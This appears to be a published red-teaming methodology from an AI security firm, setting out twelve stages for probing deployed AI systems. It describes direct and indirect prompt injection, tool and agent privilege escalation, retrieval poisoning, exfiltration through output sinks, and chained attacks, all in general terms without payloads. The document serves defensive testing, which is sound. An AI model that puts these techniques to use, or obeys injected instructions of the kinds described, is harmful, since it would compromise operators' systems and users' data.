research // methodology

The Adversarial Probing Methodology

Our 12-stage process for red-teaming production AI systems, from reconnaissance through remediation handoff. We publish it openly so clients can challenge how we work and the field can build on it — a methodology kept behind an NDA is one nobody can hold to account.

FRAMEWORK · V2.1 · Last updated May 2026

// OVERVIEW

What this document describes

Adversarial probing is the discipline of treating an AI system the way a motivated attacker would: not as a model to be benchmarked, but as a deployed system with surfaces, trust boundaries, and downstream consequences. The stages below run in sequence because each one produces evidence the next relies on — reconnaissance defines where to probe, baseline fingerprinting defines what counts as anomalous, and the early injection stages seed the payloads that later chaining stages combine.

The ladder is linear on paper and iterative in practice. A finding in stage 10 routinely sends us back to stage 05 with a sharper hypothesis. What does not change is the order in which evidence is established and the requirement that every reported finding survives independent verification.

// THE TWELVE STAGES

Reconnaissance through remediation handoff

Scoping & threat model alignment

We agree on the system boundary, the assets worth protecting, and the adversary we are simulating. Scope is written down before testing starts and governs what is in and out of bounds. Without an explicit threat model, findings have no frame of reference for severity.

Reconnaissance & surface mapping

We enumerate every entry point that reaches the model: chat surfaces, APIs, file ingestion, retrieval sources, connected tools, and any agent-to-agent channel. Each surface is catalogued with its trust assumptions and the data it can touch. The map drives where probing effort is concentrated.

Baseline behavioral fingerprinting

Before attacking, we characterize how the system behaves normally — refusal patterns, system-prompt leakage under benign pressure, tool-invocation defaults, and response variance across seeds. This baseline is what every later anomaly is measured against. It also exposes the model family and guardrail stack in use.

Direct injection probing

We test the obvious adversarial surface first: user-supplied input that attempts to override instructions, extract the system prompt, or coerce out-of-policy output. This establishes the floor of the system's resistance and seeds payloads reused in later, more complex stages.

Indirect / IPI vector mapping

We plant adversarial instructions in content the model later consumes — retrieved documents, web pages, emails, file metadata, tool outputs. Indirect prompt injection is where most production systems actually break, because the payload arrives through a channel the operator implicitly trusts. We map which sources can carry instructions and how far they propagate.

Tool & agent containment testing

Where the model can call tools or other agents, we test whether a compromised prompt can drive those tools beyond intended authority. We probe argument injection, unintended tool chaining, and privilege boundaries between agents. The question is not whether a tool can be called, but what an attacker can make it do.

RAG integrity & retrieval boundary testing

We test the retrieval layer as an attack surface in its own right: poisoning the index, crossing tenant or document-level access boundaries, and confusing the model about which retrieved content is authoritative. Retrieval that mixes trust levels in a single context window is treated as a finding regardless of whether we triggered it.

Output handling & downstream sink analysis

Model output is rarely the end of the line — it lands in browsers, shells, databases, or other systems. We trace where output flows and test for injection into those sinks: markdown that exfiltrates, HTML that executes, content that drives an unsafe downstream action. A safe model with an unsafe sink is still an exploitable system.

Cost & abuse surface analysis

We measure how cheaply an attacker can impose cost or degrade availability — token amplification, recursive tool loops, denial-of-wallet, and unbounded retrieval. These rarely leak data but can make a system economically unviable to operate. The surface is quantified in attacker effort versus operator cost.

Chained exploitation & escalation

We combine primitives from earlier stages into realistic attack paths: an indirect injection that triggers a tool call that writes to a sink that a second user reads. Single findings are often low severity in isolation and critical in chain. This stage is where the threat model from stage 01 is stress-tested against reality.

Findings verification & severity scoring

Every candidate finding is reproduced independently and scored under our published severity model before it reaches a report. We discard anything we cannot reliably trigger and record exploit reliability as a first-class attribute. Scoring is tied to exploit reliability, data sensitivity, and blast radius — not to how impressive the payload looks. See the severity scoring model →

Remediation handoff & regression fixtures

We hand engineering teams reproducible test cases, not prose. Each confirmed finding ships with a fixture that fails against the vulnerable system and passes once fixed, so the issue stays closed. Remediation is a handoff, not a wall thrown over the fence.

// WHAT THIS IS NOT

Drawing the boundary explicitly

Not a benchmark

We do not produce a leaderboard score. Benchmarks measure average-case behavior against a fixed dataset; we measure whether a specific production system can be made to do something it should not.

Not automated scanning

Automated scanners fire known payloads and report matches. They cannot reason about a novel trust boundary or chain primitives into an escalation path. We use tooling to scale recon, never to replace adversarial judgment.

Not compliance theater

A passing engagement is not a certificate to wave at auditors. The deliverable is a set of exploitable paths and the fixtures that close them. If nothing is found, we say what we tried and where the residual risk lives.

Changelog

Versions are published, not edited silently. Each entry records what structurally changed and why.

V2.1May 2026

—Added stage 09, cost & abuse surface analysis, as a distinct phase with attacker-effort-versus-operator-cost quantification.
—Expanded indirect prompt injection coverage in stage 05 to cover tool-output and file-metadata carriers.
—Clarified that retrieval mixing trust levels in one context window is a finding regardless of trigger.

V2.0Jan 2026

—Restructured the framework from 8 phases to 12 stages, separating reconnaissance, fingerprinting, and the distinct injection classes.
—Introduced regression fixtures as a required deliverable in the remediation handoff stage.
—Aligned severity scoring with the published v1.x severity model rather than ad-hoc per-engagement bands.

V1.2Sep 2025

—Added explicit RAG integrity testing as a named phase after recurring retrieval-boundary findings.
—Formalized baseline behavioral fingerprinting as a prerequisite to any active probing.

V1.0Mar 2025

—Initial public release of the adversarial probing process: 8 phases, direct and indirect injection, tool containment.